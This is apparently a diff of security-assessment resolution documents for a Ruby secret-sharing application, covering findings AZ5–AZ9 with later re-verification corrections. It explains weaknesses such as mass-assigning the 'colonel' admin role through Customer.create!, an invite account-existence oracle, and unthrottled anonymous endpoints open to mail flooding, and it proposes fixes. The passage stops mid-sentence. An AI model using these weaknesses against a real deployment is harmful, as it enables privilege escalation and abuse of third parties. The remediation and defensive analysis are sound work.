+- **Reuse `Familia::VerifiableIdentifier` for orgs:** that mints *random* 256-bit ids with an embedded tag,
+  not a *deterministic* function of objid. Org extids must stay deterministic (same objid → same extid for
+  `extid_lookup`), so the keyed-HMAC branch of `external_identifier` is the right primitive — it keeps
+  determinism while adding the key. Adopt VerifiableIdentifier's *secret-management discipline*, not its id
+  shape.
+
+## Test / verification
+
+1. **Keyed derivation:** with `EXTID_HMAC_SECRET` set, two different secrets produce different extids for the
+   same objid; the same secret is stable across runs (determinism preserved for lookup).
+2. **Fail-closed:** with the env var unset, the first extid derivation raises `KeyError` (loud), and the
+   model file still *loads* (callable defers the fetch) — assert both.
+3. **Non-derivability:** given only an objid and no secret, the SHA-256 formula no longer reproduces the
+   stored extid.
+4. **Migration regression:** existing seeded orgs still resolve via `find_by_extid` after the change (proves
+   the chosen migration strategy preserves old URLs).
+
+## Effort & risk
+
+- **Effort:** Low to add the `secret:`; Medium overall because of secret provisioning + the
+  migration/rotation decision.
+- **Back-compat:** **highest-risk item in the set** — if extids are recomputed on read rather than persisted,
+  turning on the key silently changes every org's public id and breaks existing URLs and the lookup index.
+  Resolve the "persisted vs. recomputed" question (step 3, *Confirm first*) **before** enabling in any
+  environment with existing data.
+- **Risk:** Low for new deployments; Medium–High for migration of existing data — gate behind the
+  verification above.

--- a/docs/security/assessment-2026-06-22/resolutions/AZ5-organization-extid-keyed-hmac.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ5-organization-extid-keyed-hmac.md
@@ -1,13 +1,35 @@
 # AZ5 — Organization extid uses plain SHA-256, not a keyed HMAC
 
-- **Severity:** Medium — **NEEDS-VALIDATION** (defense-in-depth; compounded by AZ2 leaking objid)
-- **Status:** Proposed fix
+- **Severity:** Medium — **NEEDS-VALIDATION** (defense-in-depth; compounded by AZ2 leaking objid) — recalibrated to Low by 2026-06-24 re-verification (§7)
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below**
 - **Affects default config?** Yes (every org has an extid; no `secret:` is configured)
 - **Related:** finding 02 F5; AZ2 (objid leak removes the "objid is secret" assumption);
   the verifiable-id approach used for secrets (F12)
 - **Primary files:** `lib/onetime/models/organization.rb:46` (`feature :external_identifier`),
   `familia/lib/familia/features/external_identifier.rb:300-346` (derivation),
   `familia/lib/familia/verifiable_identifier.rb:45-94` (the keyed-secret pattern to mirror)
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §5).**
+> The prescribed `secret: -> { ENV.fetch('EXTID_HMAC_SECRET') }` ships an **always-on deploy hazard**:
+> `EXTID_HMAC_SECRET` is never bridged into Familia. The boot bridge maps only the verifiable-id secret
+> (`configure_familia.rb:55` sets `VERIFIABLE_ID_HMAC_SECRET` from `IDENTIFIER_SECRET`), nothing wires
+> `EXTID_HMAC_SECRET`. Yet `Organization.create!` runs on **every** signup (default workspace, not orgs-gated)
+> via `CreateDefaultWorkspace#create_default_organization` (`create_default_workspace.rb:80`), and its
+> signup-hook callers wrap it in `ErrorHandler.safe_execute` (`account.rb:230`, `omniauth.rb:266`), which
+> catches `StandardError`, logs it, and **returns nil** (`error_handler.rb:43-64`). So on an unprovisioned
+> deploy the lazy `ENV.fetch` raises
+> `KeyError` at first derivation, gets swallowed to nil, and default-workspace creation silently fails — the
+> user lands with no workspace and no error surfaced to the request. (Logged, not raised; not a literal inline
+> `rescue => nil`, but the same swallow-to-nil effect.)
+>
+> **Corrections:**
+> 1. Add the `EXTID_HMAC_SECRET` env bridge alongside line 55 **and** a deploy-ordering / boot guard so a
+>    missing secret fails loudly at boot, not silently at first signup. Do not rely on the lazy callable to
+>    surface the error — the `safe_execute` swallow defeats it.
+> 2. **Scope is incomplete.** `Customer` and `CustomDomain` share the same unkeyed external-id pattern; an
+>    org-only fix leaves those derivable. Apply the keyed secret across all three id domains.
+>
+> **Severity recalibrated Medium → Low** (§7, AZ1/AZ3/AZ4/AZ5 row): latent, default-off, no reachable sink.
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/AZ6-receipt-safe-dump-owner-id.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ6-receipt-safe-dump-owner-id.md
@@ -1,0 +1,106 @@
+# AZ6 — Receipt safe_dump exposes creator custid/owner_id via anonymous endpoints
+
+- **Severity:** Low — **CONFIRMED**
+- **Status:** Proposed fix
+- **Affects default config?** Yes (anonymous receipt show/burn/batch is default behavior)
+- **Related:** finding 02 F6; AZ2 (same internal-ID-leak class for Organization)
+- **Primary files:** `lib/onetime/models/receipt/features/safe_dump_fields.rb:54-57`,
+  `apps/api/v3/logic/secrets.rb:216-255` (`ShowMultipleReceipts`),
+  v2 receipt show/burn paths that also serialize via `safe_dump`
+
+## Problem (recap)
+
+Receipt `safe_dump` emits the creator's internal customer identifiers:
+
+```ruby
+# lib/onetime/models/receipt/features/safe_dump_fields.rb:54-57
+base.safe_dump_field :identifier, ->(obj) { obj.identifier }
+base.safe_dump_field :key, ->(obj) { obj.identifier }
+base.safe_dump_field :custid       # :56 — creator's internal customer id
+base.safe_dump_field :owner_id     # :57 — creator's internal customer id
+```
+
+Receipts use a **possession-based** access model (assessment §3, F12): holding the receipt identifier is the
+credential, and show/burn are reachable **anonymously**. `ShowMultipleReceipts` returns `safe_dump` for up to
+25 receipts by id with no authentication:
+
+```ruby
+# apps/api/v3/logic/secrets.rb:246-249
+def process
+  receipt_objects = Onetime::Receipt.load_multi(identifiers).compact
+  @records        = receipt_objects.map(&:safe_dump)   # includes custid + owner_id
+  success_data
+end
+```
+
+So any party holding a receipt identifier learns the creator's internal customer custid/owner_id. Severity is
+Low — the identifier is an unguessable 256-bit HMAC-signed value typically held only by the creator — but the
+internal customer id has no reason to be in an anonymously-reachable dump, and it enables correlation of
+multiple receipts to one customer.
+
+## Root cause
+
+Same shape as AZ2: a single `safe_dump` field map is reused across all audiences, including an
+unauthenticated possession-based path. Internal owner identifiers were included for the *authenticated owner's*
+own listing views but are emitted unconditionally, including to anonymous callers. `safe_dump` is an allowlist
+of fields, but the allowlist itself includes the sensitive ids.
+
+## Prescribed resolution
+
+Drop the internal creator identifiers (`custid`, `owner_id`) from the Receipt `safe_dump` allowlist. Display
+flags that legitimately need "is this mine?" already come from `Receipt#owner?(cust)`
+(assessment §3, `receipt.rb:148-150`) computed in the logic layer, not from emitting the raw custid.
+
+### Implementation steps
+
+1. Remove the two internal-id fields from the Receipt dump:
+
+   ```ruby
+   # lib/onetime/models/receipt/features/safe_dump_fields.rb — delete:
+   base.safe_dump_field :custid      # :56
+   base.safe_dump_field :owner_id    # :57
+   ```
+
+   The remaining fields (`identifier`/`key`, `state`, `secret_shortid`, `secret_identifier`, counters, etc.)
+   are what the possession-based UI actually needs.
+
+2. If an authenticated owner view genuinely needs to confirm ownership, expose a **derived boolean** computed
+   in the logic class rather than the raw id — and only on authenticated paths:
+
+   ```ruby
+   # In an authenticated receipt logic class (e.g. list_receipts / update_receipt response builder)
+   dump = receipt.safe_dump
+   dump[:is_owner] = receipt.owner?(cust)   # boolean, no internal id leaked
+   ```
+
+   The anonymous `ShowMultipleReceipts`/show/burn paths emit the id-free dump and never compute ownership
+   for an anonymous caller.
+
+3. Verify the v2 show/burn serialization (`apps/api/v2/logic/secrets/*`) and v1 paths all funnel through the
+   same `safe_dump`, so removing the fields covers every API version at once (no per-version edit needed).
+
+### Alternatives considered
+
+- **Strip custid/owner_id only in the anonymous serialization path:** more code and more chances to miss a
+  path. Since no audience needs the raw internal id in the dump, removing it from the allowlist is simpler and
+  strictly safer.
+- **Replace custid with the creator's `extid`:** still leaks creator identity to anonymous holders. For a
+  possession-based receipt there is no need to disclose *who* created it; drop it entirely.
+
+## Test / verification
+
+Add to `apps/api/v3/spec/logic/secrets/` (and a v2 receipt spec):
+1. **Anonymous batch:** `ShowMultipleReceipts` for a known receipt id → response contains `identifier`/
+   `state` but **no** `custid` or `owner_id`.
+2. **Anonymous show/burn:** single receipt dump → no `custid`/`owner_id`.
+3. **Authenticated owner view (if step 2 added):** `is_owner` boolean is present and correct, still no raw
+   internal id.
+4. **JSON-key snapshot:** diff the receipt response keys against frontend/SDK consumers to catch readers of
+   the removed fields.
+
+## Effort & risk
+
+- **Effort:** Low — two deleted field registrations, optional `is_owner` helper, and specs.
+- **Back-compat:** removing `custid`/`owner_id` changes the receipt JSON shape; grep consumers first. They are
+  internal ids, so legitimate clients should not depend on them.
+- **Risk:** Low. Possession-based access is unchanged; only the emitted creator id is removed.

--- a/docs/security/assessment-2026-06-22/resolutions/AZ7-show-invite-minimize-disclosure.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ7-show-invite-minimize-disclosure.md
@@ -1,0 +1,126 @@
+# AZ7 — show_invite discloses inviter email and an account-exists oracle
+
+- **Severity:** Low — **CONFIRMED**
+- **Status:** Proposed fix (product decision required on inviter-email exposure)
+- **Affects default config?** Yes (the noauth `GET /api/invite/:token` endpoint)
+- **Related:** finding 02 F7; F10 (invite token rate limiter)
+- **Primary files:** `apps/api/invite/logic/base.rb:51-64` (`serialize_invitation_public`),
+  `apps/api/invite/logic/invites/show_invite.rb:65-99` (`success_data`, `account_exists?`)
+
+## Problem (recap)
+
+`GET /api/invite/:token` is `noauth` (the token is the credential) and returns, to any token holder, more
+than the recipient needs to decide whether to accept:
+
+```ruby
+# apps/api/invite/logic/base.rb:55-63
+{
+  organization_name: organization&.display_name,
+  organization_id: organization&.extid,
+  email: invitation.invited_email,
+  role: invitation.role,
+  invited_by_email: inviter&.safe_dump&.dig(:email),   # :60 — inviter's email address
+  expires_at: invitation.invitation_expires_at,
+  status: effective_invitation_status(invitation),
+}
+```
+
+```ruby
+# apps/api/invite/logic/invites/show_invite.rb:70-71, 97-99
+result[:record][:account_exists] = account_exists?
+...
+def account_exists?
+  Onetime::Customer.email_exists?(@invitation.invited_email)   # account-existence oracle
+end
+```
+
+Two marginal leaks:
+- **Inviter email** (`base.rb:60`): the token holder learns a specific employee's email address. Useful for
+  targeted phishing if a token leaks (forwarded mail, shared link, log).
+- **Account-existence oracle** (`show_invite.rb:97-99`): the response reveals whether a OneTimeSecret account
+  already exists for the invited email. Although keyed to the *invited* email (which the holder already
+  knows), it confirms account existence on this platform for that address.
+
+Severity is Low: the token is a 256-bit single-use value and the endpoint is rate-limited
+(`InviteTokenRateLimiter`, F10). The recipient is the intended audience for most of the payload. The fix is
+about *minimizing disclosure to whatever holds the token*, in case the token is not solely in the intended
+recipient's hands.
+
+## Root cause
+
+The serializer was built to power a rich pre-acceptance UI ("You've been invited by Alice to Acme; you
+already have an account, sign in to accept") and exposes the data needed for that UX directly on the
+unauthenticated endpoint. The convenience fields (`invited_by_email`, `account_exists`) are not required to
+*render the accept decision* and are disclosed before the holder has proven they are the recipient.
+
+## Prescribed resolution
+
+Minimize the pre-acceptance payload to what is needed to render the accept/decline screen, and replace the
+raw oracle/email with non-identifying signals. Drive the "sign in vs. create account" branch off auth state
+the client already has, not off a server-side existence probe.
+
+### Implementation steps
+
+1. **Drop the inviter's email; use the inviter's display name (or org-level attribution) instead.** If the UI
+   needs to show who invited the user, show a name, not a contactable address:
+
+   ```ruby
+   # apps/api/invite/logic/base.rb — serialize_invitation_public
+   {
+     organization_name: organization&.display_name,
+     organization_id:   organization&.extid,
+     email:             invitation.invited_email,   # the recipient already knows their own email
+     role:              invitation.role,
+     invited_by_name:   inviter&.safe_dump&.dig(:display_name),  # name, not email; or omit entirely
+     expires_at:        invitation.invitation_expires_at,
+     status:            effective_invitation_status(invitation),
+   }
+   ```
+
+   *Confirm first (product decision):* whether to show inviter attribution at all pre-acceptance. The
+   safest option is to omit inviter identity until the invite is accepted (post-auth). If attribution is
+   desired for trust, a display name is the minimal disclosure.
+
+2. **Remove the account-existence oracle from the response.** The frontend can decide between "sign in" and
+   "create account" from the *user's own* session/auth state and the available `auth_methods`
+   (`show_invite.rb:101-105`), not from a server probe of the invited email:
+
+   ```ruby
+   # apps/api/invite/logic/invites/show_invite.rb — success_data
+   result[:record][:actionable] = actionable?
+   # remove: result[:record][:account_exists] = account_exists?
+   ```
+
+   Delete the `account_exists?` helper (`:97-99`). If a "you may already have an account" hint is genuinely
+   required, defer it to *after* the user submits their email through the authenticated accept/signup flow,
+   where existence is revealed only to the address owner — not to any token holder.
+
+3. Keep the existing rate limiter (`show_invite.rb:36-40`) and the 256-bit token; AZ7 reduces what a leaked
+   token discloses, it does not replace the token's protection.
+
+### Alternatives considered
+
+- **Leave inviter email, justify by "recipient is the audience":** acceptable today given the strong token,
+  but tokens leak (forwarded emails, chat, proxy logs). Minimizing the payload is the long-term-safe default
+  and costs little.
+- **Keep `account_exists` but only when the request is authenticated as the invited email:** more complex and
+  the endpoint is `noauth` by design (pre-account). Removing the oracle and branching on client auth state is
+  simpler and leaks nothing.
+
+## Test / verification
+
+Add to `apps/api/invite/spec/logic/invites/`:
+1. **No inviter email:** `show_invite` response has no `invited_by_email` key (and, if attribution kept, only
+   `invited_by_name`).
+2. **No oracle:** response has no `account_exists` key.
+3. **UI signals intact:** `actionable`, `auth_methods`, `branding` still present and correct so the frontend
+   can render the screen and the accept/decline flow still works end-to-end.
+4. **Accept flow unchanged:** existing accept/signup-and-accept specs still pass (email binding enforced
+   downstream, assessment §6 A2).
+
+## Effort & risk
+
+- **Effort:** Low — serializer edits and removing one helper, plus the product decision on attribution.
+- **Back-compat:** the pre-acceptance UI must stop reading `invited_by_email`/`account_exists`. Coordinate the
+  frontend change; the accept flow itself is unaffected.
+- **Risk:** Low. No change to token validation, single-use, expiry, or email binding.

--- a/docs/security/assessment-2026-06-22/resolutions/AZ7-show-invite-minimize-disclosure.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ7-show-invite-minimize-disclosure.md
@@ -1,11 +1,24 @@
 # AZ7 — show_invite discloses inviter email and an account-exists oracle
 
 - **Severity:** Low — **CONFIRMED**
-- **Status:** Proposed fix (product decision required on inviter-email exposure)
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below** (product decision still required on inviter-email exposure)
 - **Affects default config?** Yes (the noauth `GET /api/invite/:token` endpoint)
 - **Related:** finding 02 F7; F10 (invite token rate limiter)
 - **Primary files:** `apps/api/invite/logic/base.rb:51-64` (`serialize_invitation_public`),
   `apps/api/invite/logic/invites/show_invite.rb:65-99` (`success_data`, `account_exists?`)
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §5).**
+> Escalated to **incomplete_regresses**: the prescribed **backend-only** minimization breaks invite acceptance
+> in the frontend. `AcceptInvite.vue:134` runs `showInviteResponseSchema.parse(response.data.record)`, and that
+> schema requires both fields non-optionally — `invited_by_email: z.string().nullable()`
+> (`src/schemas/api/invite/responses/show-invite.ts:80`) and `account_exists: z.boolean()` (`:83`). Dropping
+> either from the backend response throws a zod parse error before the screen renders. `account_exists` also
+> drives the signin-vs-signup branch at `AcceptInvite.vue:97`, and `invited_by_email` is rendered in the
+> template (`AcceptInvite.vue:430-431`, +492/577/653).
+> **Correction:** ship the frontend change in lockstep with the backend minimization — relax the zod schema
+> (`show-invite.ts:80,83`) to make the fields optional/removed, rederive the signin/signup branch (`:97`) from
+> client auth state, and drop the inviter-email template bindings. Do **not** land the backend edit alone.
+> Severity unchanged (Low).
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/AZ8-customer-create-allowlist.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ8-customer-create-allowlist.md
@@ -1,0 +1,134 @@
+# AZ8 — Customer.create! has no allowlist (role/verified mass-assignable at the model layer)
+
+- **Severity:** Low — **NEEDS-VALIDATION** (safe today; all signup paths hardcode `role`)
+- **Status:** Proposed fix
+- **Affects default config?** Yes (account creation), but **not exploitable today**
+- **Related:** finding 02 F8; AZ3 (identical defect in `Organization.create!`); colonel role model (§4, F11)
+- **Primary files:** `lib/onetime/models/customer.rb:271-313` (`create!`),
+  `lib/onetime/models/customer/features/status.rb` (`role`/`verified`/`verified_by` fields),
+  callers: `apps/api/account/logic/account/create_account.rb:94,100-104`,
+  `apps/web/auth/operations/create_customer.rb`, `sync_session.rb`
+
+## Problem (recap)
+
+`Customer.create!` forwards `**kwargs` to `super` with no field allowlist:
+
+```ruby
+# lib/onetime/models/customer.rb:271-313 (abridged)
+def create!(email = nil, **kwargs)
+  email ||= kwargs[:email] || kwargs['email']
+  email = OT::Utils.normalize_email(email)
+  raise Familia::Problem, 'email is required' if email.empty?
+  raise Familia::RecordExistsError, ... if email_exists?(email)
+  ...
+  kwargs[:email] = email
+  cust = super(**kwargs)        # any declared field settable, including role/verified
+  cust.save
+  cust
+end
+```
+
+`role`, `verified`, and `verified_by` are plain writable Customer fields (`customer/features/status.rb`). The
+colonel superuser role is *exactly* the Customer `role` field set to `'colonel'` (assessment §4, F11). So
+`Customer.create!(email: 'x@y', role: 'colonel', verified: true)` would mint a verified colonel at the Ruby
+level.
+
+*Confirm first:* this is **safe today only by caller discipline**. Every production signup path hardcodes the
+role and verification rather than forwarding request params:
+
+- `create_account.rb:94` creates with `email:` only; then sets `@customer_role = 'customer'`, `cust.verified`,
+  `cust.role` explicitly (`:100-104`).
+- `apps/web/auth/operations/create_customer.rb` and `sync_session.rb` likewise hardcode `'customer'`
+  (assessment §4).
+
+There is currently **no** endpoint that forwards a raw params hash into `Customer.create!`. The fix prevents
+a *future* endpoint from turning this into a privilege-escalation vector — the highest-impact mass-assignment
+sink in the app, since `role: 'colonel'` is full site-admin.
+
+## Root cause
+
+Same as AZ3: the model boundary trusts callers instead of enforcing its own invariant. Familia's keyword-arg
+initialization sets any declared field (assessment §5, `horreum.rb:446`), and `guard_allowed_fields!` only
+blocks *undeclared* fields — it does not protect declared sensitive fields like `role`/`verified`. The single
+create chokepoint accepts an unbounded attribute set.
+
+## Prescribed resolution
+
+Allowlist the attributes a `create!` caller may set, and **never** accept `role`, `verified`, or
+`verified_by` from create-time kwargs. Account verification and role assignment must happen through explicit,
+intentional calls after creation (as the current callers already do), not via the constructor.
+
+### Implementation steps
+
+1. Filter kwargs against an explicit allowlist and reject privilege fields:
+
+   ```ruby
+   # lib/onetime/models/customer.rb
+   # Fields a caller may set at creation. Privilege/verification fields are
+   # intentionally excluded — assign them explicitly after create, never from input.
+   CREATE_ALLOWED_ATTRS = %i[email locale].freeze   # extend to other benign profile fields as needed
+   CREATE_FORBIDDEN_ATTRS = %i[role verified verified_by].freeze
+
+   def create!(email = nil, **kwargs)
+     email ||= kwargs[:email] || kwargs['email']
+     email = OT::Utils.normalize_email(email)
+     loggable_email = OT::Utils.obscure_email(email)
+     raise Familia::Problem, 'email is required' if email.empty?
+     raise Familia::RecordExistsError, "Customer exists #{loggable_email}" if email_exists?(email)
+
+     # Hard fail-closed on privilege fields, regardless of allowlist drift.
+     sym_keys = kwargs.keys.map(&:to_sym)
+     forbidden = sym_keys & CREATE_FORBIDDEN_ATTRS
+     raise Familia::Problem, "Disallowed attributes at create: #{forbidden.join(', ')}" unless forbidden.empty?
+
+     permitted = kwargs.transform_keys(&:to_sym).slice(*CREATE_ALLOWED_ATTRS)
+     permitted[:email] = email
+
+     Onetime.auth_logger.info 'Creating customer',
+       { email: loggable_email, kwargs: permitted.keys, action: 'create' }
+
+     cust = super(**permitted)
+     cust.save
+     # ... existing success logging ...
+     cust
+   end
+   ```
+
+   The explicit `CREATE_FORBIDDEN_ATTRS` raise is the security-critical line: even if the allowlist later
+   gains a field by mistake, `role`/`verified`/`verified_by` can never be set through `create!`.
+
+2. Keep the existing post-create assignment in callers (`create_account.rb:100-104` sets `role`/`verified`
+   explicitly) — that path is unaffected because it assigns *after* `create!`, not through it.
+
+3. **Defense-in-depth (recommended):** treat `role` as not-externally-assignable in general. If Familia
+   supports a per-field write guard, register `role`/`verified`/`verified_by`; otherwise route all role
+   changes through the CLI/`role_command` path (the only legitimate colonel writer today, §4 F11) and
+   document the fields as internal-only in the model header.
+
+### Alternatives considered
+
+- **Silently drop forbidden keys:** weaker than raising — a future endpoint that mistakenly forwards
+  `params` would pass silently and the bug would hide until an audit. The fail-closed `raise` makes
+  misuse a loud test failure.
+- **Rely on caller discipline + grep/lint:** rejected for the same reason as AZ3 — `role: 'colonel'` is the
+  worst-case escalation in the app; the model must enforce its own invariant once rather than depend on every
+  future caller being correct.
+
+## Test / verification
+
+Add to the Customer model spec:
+1. **Privilege rejection:** `Customer.create!(email: 'a@b', role: 'colonel')` raises;
+   `Customer.create!(email: 'a@b', verified: true)` raises; `verified_by:` raises.
+2. **Default role:** a customer created via `create!` has the non-privileged default role (not colonel) and
+   is unverified until explicitly set.
+3. **Allowed attrs pass:** `email`/`locale` are accepted and persisted.
+4. **Caller regression:** `create_account_spec` and the auth-operation specs still pass (they assign
+   role/verified after create).
+
+## Effort & risk
+
+- **Effort:** Low — localized to `create!`, plus model specs.
+- **Back-compat:** none broken if the allowlist matches what real callers pass (`email`, and verify whether
+  any caller passes additional benign fields like `locale` at create — extend the allowlist accordingly).
+- **Risk:** Low. No production path forwards privilege fields into `create!` today, so the change is
+  transparent to current behavior while closing a high-impact future vector.

--- a/docs/security/assessment-2026-06-22/resolutions/AZ8-customer-create-allowlist.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ8-customer-create-allowlist.md
@@ -1,13 +1,31 @@
 # AZ8 — Customer.create! has no allowlist (role/verified mass-assignable at the model layer)
 
 - **Severity:** Low — **NEEDS-VALIDATION** (safe today; all signup paths hardcode `role`)
-- **Status:** Proposed fix
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below**
 - **Affects default config?** Yes (account creation), but **not exploitable today**
 - **Related:** finding 02 F8; AZ3 (identical defect in `Organization.create!`); colonel role model (§4, F11)
 - **Primary files:** `lib/onetime/models/customer.rb:271-313` (`create!`),
   `lib/onetime/models/customer/features/status.rb` (`role`/`verified`/`verified_by` fields),
   callers: `apps/api/account/logic/account/create_account.rb:94,100-104`,
   `apps/web/auth/operations/create_customer.rb`, `sync_session.rb`
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §3c/§6).**
+> The name-based fix below (`CREATE_FORBIDDEN_ATTRS` raising on `role`/`verified`/`verified_by`) **breaks
+> every legitimate caller**, and there are **7** of them — not the 3 the "Primary files" line above implies —
+> across 5 files: `apps/web/auth/operations/create_customer.rb:62`, `sync_session.rb:175`,
+> `apitoken_command.rb:168` **and `:190`**, `customers/create_command.rb:97` **and `:121`**, and
+> `dev_basic_auth_strategy.rb:182`. (`create_account.rb` is **not** among the 7 — it passes `email:` only and
+> assigns role/verified *after* create, the safe pattern; the Primary-files list overstates its role here.)
+>
+> A name-based raise cannot work at all: at the model boundary a hardcoded `role: 'customer'` and an
+> attacker-forwarded `role: 'customer'` are byte-identical, so there is no way to special-case the safe
+> literals.
+>
+> **Corrected fix (opt-in gate):** in `Customer.create!`, `kwargs.delete(:allow_privileged)`; **unless** that
+> flag was set, raise if any of `role`/`verified`/`verified_by` is present. Add `allow_privileged: true` to
+> the 7 legitimate callers. A future `create!(**raw_params)` carries no flag, so an attacker's
+> `role: 'colonel'` raises. (`allow_privileged` goes on exactly the 7 callsites above — not on every
+> `create!` caller.)
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/AZ9-incoming-submit-rate-limit.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ9-incoming-submit-rate-limit.md
@@ -1,0 +1,158 @@
+# AZ9 — No in-logic rate limit on anonymous incoming /secret and /validate (mail-flood / Redis-flood abuse)
+
+- **Severity:** Low–Medium — **NEEDS-VALIDATION** (Medium absent any upstream limiter; Low if one exists)
+- **Status:** Proposed fix
+- **Affects default config?** Only when the **incoming** feature is enabled for a deployment/domain (it is
+  off unless configured), but anonymous-by-design when on
+- **Related:** finding 02 F9; F10 (invite limiter IP resolution); existing limiters
+  `FeedbackRateLimiter`, `InviteTokenRateLimiter`, `DnsRateLimiter`
+- **Primary files:** `apps/api/incoming/logic/create_incoming_secret.rb:67-99,216-239`,
+  `apps/api/incoming/logic/validate_recipient.rb`, `apps/api/incoming/routes.txt:22-24`,
+  `lib/onetime/security/feedback_rate_limiter.rb` (pattern to mirror)
+
+## Problem (recap)
+
+All three incoming routes are `noauth` (`apps/api/incoming/routes.txt:22-24`,
+`apps/api/incoming/auth_strategies.rb:26`), and neither `/secret` nor `/validate` applies a rate limiter in
+its logic class (`raise_concerns` does entitlement + validation only, `create_incoming_secret.rb:67-99`). Each
+successful `/secret`:
+
+- creates and persists an encrypted secret + receipt in Redis (`create_and_encrypt_secret`, `:180-203`), and
+- **enqueues an email to a configured recipient** (`send_recipient_notification`, `:216-235`):
+
+```ruby
+# create_incoming_secret.rb:222-233
+Onetime::Jobs::Publisher.enqueue_email(
+  :incoming_secret,
+  { secret_key: secret.identifier, recipient: recipient_email, memo: memo, ... },
+  domain_id: domain_id,
+)
+```
+
+Valid recipient hashes are **published** by `GET /api/incoming/config`
+(assessment §7, `get_config.rb:56-60`), so an attacker does not need to guess them. With no per-IP/per-domain
+limiter, an anonymous attacker can:
+- **flood a configured recipient's mailbox** with notification emails (one per `/secret`), and/or
+- **flood Redis** with anonymous secret/receipt records.
+
+The recipient *email* is never recoverable (hash indirection, §7 B5), and per-domain entitlement gating
+(`require_domain_entitlement!('incoming_secrets')`, `:71`) limits *which* domains are usable — but neither
+stops volume abuse against an enabled domain's known recipients.
+
+*Confirm first:* whether an **upstream** per-IP limiter (reverse proxy / middleware / WAF) already throttles
+these routes in production. The assessment flags this as the deciding factor: Medium if no limiter exists,
+Low if one does. The fix below adds an in-app limiter so protection does not depend on deployment-specific
+infrastructure.
+
+## Root cause
+
+The incoming feature was designed for anonymous submission (bug-bounty / tip intake), so it deliberately has
+no auth to anchor a per-account limit. But "anonymous" does not mean "unbounded": the codebase already has a
+reusable per-IP limiter pattern for exactly this situation (`FeedbackRateLimiter`,
+`InviteTokenRateLimiter`), and it simply was not applied to the incoming endpoints. The send-email side
+effect makes the missing limit an abuse amplifier (one cheap request → one delivered email to a third party).
+
+## Prescribed resolution
+
+Add an in-logic, per-IP **and** per-domain rate limiter to `/secret` (submission + email) and `/validate`
+(probe), reusing the existing limiter shape so behavior, logging, and test bypass are consistent. Bucket by
+both client IP and the resolved domain so one abusive IP cannot exhaust a domain and one domain's abuse does
+not affect others.
+
+### Implementation steps
+
+1. Add `Onetime::Security::IncomingRateLimiter` modeled on `FeedbackRateLimiter`
+   (`lib/onetime/security/feedback_rate_limiter.rb`): an atomic-Lua INCR + EXPIRE + lockout, `check!` /
+   `record!`, IP sanitization, obscured-IP logging, and the `test_bypass?` escape hatch. Bucket the key on
+   **(domain, ip)** so limits are per-tenant:
+
+   ```ruby
+   # lib/onetime/security/incoming_rate_limiter.rb (sketch — mirror FeedbackRateLimiter)
+   module Onetime::Security
+     module IncomingRateLimiter
+       MAX_SUBMISSIONS  = 10    # per window, per (domain, ip) — tune for legitimate tip volume
+       RATE_WINDOW      = 600   # 10 min
+       LOCKOUT_DURATION = 1200  # 20 min
+
+       def check_incoming_rate_limit!(domain_key, ip_address)
+         return if ip_address.to_s.empty?
+         # ... same pipelined lockout check + LimitExceeded raise as FeedbackRateLimiter ...
+       end
+
+       def record_incoming_submission!(domain_key, ip_address)
+         # ... same atomic Lua INCR/EXPIRE/lockout, keyed "incoming:{domain_key}:{ip}" ...
+       end
+     end
+   end
+   ```
+
+2. Wire it into `CreateIncomingSecret`. Check **before** the expensive work and the email enqueue; record on
+   success so failed validations do not consume budget asymmetrically (or record on every attempt for
+   `/validate` to throttle probing):
+
+   ```ruby
+   # apps/api/incoming/logic/create_incoming_secret.rb
+   include Onetime::Security::IncomingRateLimiter
+
+   def raise_concerns
+     client_ip  = @strategy_result&.metadata&.dig(:ip) || @strategy_result&.metadata&.dig('ip')
+     domain_key = display_domain.to_s.empty? ? 'canonical' : display_domain
+     check_incoming_rate_limit!(domain_key, client_ip)   # fail-closed on abuse
+
+     resolver.require_domain_entitlement!('incoming_secrets')
+     # ... existing validation ...
+   end
+
+   def process
+     create_and_encrypt_secret
+     @greenlighted = receipt.valid? && secret.valid?
+     raise_form_error 'Failed to create secret' unless @greenlighted
+     update_customer_stats
+     send_recipient_notification          # the rate-limited side effect
+     record_incoming_submission!(domain_key, client_ip)   # count successful sends
+     success_data
+   end
+   ```
+
+3. Apply the same limiter to `ValidateRecipient` (`validate_recipient.rb`) — it is a noauth probe against the
+   recipient config; rate-limit it (record every attempt) to prevent enumeration/abuse of `/validate`.
+   `GetConfig` is a read of already-public hashes; limit it only if probing is a concern.
+
+4. **IP resolution (shared with F10):** the limiter is only effective if `metadata[:ip]` carries the real
+   client IP. Verify the production proxy populates it via
+   `lib/onetime/application/auth_strategies/helpers.rb` (the invite limiter falls back to `0.0.0.0`, F10 /
+   `show_invite.rb:37`). If IP cannot be trusted, fall back to a stricter **per-domain global** ceiling so a
+   single domain's recipients cannot be flooded regardless of source IP.
+
+### Alternatives considered
+
+- **Rely on an upstream proxy/WAF limiter:** acceptable *if confirmed present and correctly configured*, but
+  it is deployment-specific and invisible to the app. An in-app limiter guarantees the protection ships with
+  the feature (defense-in-depth, and the only protection for self-hosted deployments without a WAF).
+- **Per-IP only (no domain bucket):** insufficient — a botnet spreads across IPs. The per-domain ceiling (a
+  cap on total submissions/emails per domain per window) is the backstop that actually protects a recipient's
+  mailbox; combine both.
+- **CAPTCHA on submit:** heavier UX cost and at odds with the anonymous-tip use case; a rate limit is the
+  lighter, sufficient control for the documented abuse (mail-flood / Redis-flood).
+
+## Test / verification
+
+Add `lib/onetime/security/spec` + incoming logic specs (set `force_enabled` to exercise the limiter in test,
